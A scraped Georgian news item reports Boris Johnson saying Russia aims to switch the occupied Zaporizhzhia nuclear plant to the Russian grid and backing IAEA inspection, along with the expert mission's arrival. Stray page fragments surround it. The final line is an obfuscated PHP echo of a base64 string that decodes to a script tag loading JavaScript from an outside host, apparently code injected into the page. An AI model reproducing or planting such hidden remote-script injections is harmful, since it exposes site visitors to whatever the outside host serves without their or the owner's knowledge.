celsiusi
ავერსი შნაიდერი
დიდი ბრიტანეთის პრემიერმინისტრის, ბორის ჯონსონის თქმით, ზაპოროჟიეს ატომური ელექტროსადგური უკრაინისაა და მასზე კონტროლი უკრაინელებმა უნდა დაიბრუნონ. მისი თქმით, რუსეთის მიზანი ზაპოროჟიეს ატომური ელექტროსადგურის ქსელიდან გათიშვაა, რომ რუსულ ქსელს შეუერთოს. 
 
"რუსეთის მიზანია ატომური ელექტროსადგური უკრაინული ქსელიდან გათიშოს და რუსულ ქსელს შეუერთოს. ამ ოთახში ბირთვული ექსპერტები არიან და მეუბნებიან, რომ მსგავსი რამის გაკეთება რისკებს შეიცავს ჩვენა არ გვინდა რაიმე რისკზე წასვლა ზაპოროჟიესთან დაკავშრიებით, ვფიქრობ მნიშვნელოვანია, რომ ბატონ გროსს და ატომური ენერგიის საერთაშორისო სააგენტოს მივცეთ უფლება განახორციელონ ინსპექტირება" - ამბობს ჯონსონი.
 
შეგახსენებთ, უკრაინის მთავრობის მიწვევით, IAEA-მ შექმნა მისია დროებით ოკუპირებული ზაპოროჟიეს ატომური ელექტროსადგურის მოსანახულებლად. მის შემადგენლობაში 14 საერთაშორისო ექსპერტია, რომლებიც ადგილზე გუშინ, 31 აგვისტოს ჩავიდნენ.
488
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");